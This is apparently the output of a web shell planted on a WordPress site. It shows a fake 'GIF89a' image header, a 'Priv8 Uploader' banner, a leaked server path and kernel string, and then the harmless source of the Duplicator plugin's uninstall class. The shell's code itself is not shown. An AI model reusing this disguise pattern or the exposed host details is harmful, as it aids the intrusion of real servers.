GIF89a;
Notice: Undefined index: in /home/bs3263/domains/poolq.ee/public_html/wp-content/plugins/classic-editor/classic-editor.php on line 3
Priv8 Uploader By InMyMine7
Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
<?php
/**
* Interface that collects the functions of initial duplicator Bootstrap
*
* @package Duplicator
* @copyright (c) 2022, Snap Creek LLC
*/
namespace Duplicator\Core;
/**
* Uninstall class
*/
class Unistall
{
/**
* Registrer unistall hoosk
*
* @return void
*/
public static function registerHooks()
{
if (is_admin()) {
register_deactivation_hook(DUPLICATOR_LITE_FILE, array(__CLASS__, 'deactivate'));
}
}
/**
* Deactivation Hook:
* Hooked into `register_deactivation_hook`. Routines used to deactivate the plugin
* For uninstall see uninstall.php WordPress by default will call the uninstall.php file
*
* @return void
*/
public static function deactivate()
{
MigrationMng::renameInstallersPhpFiles();
do_action('duplicator_after_deactivation');
}
}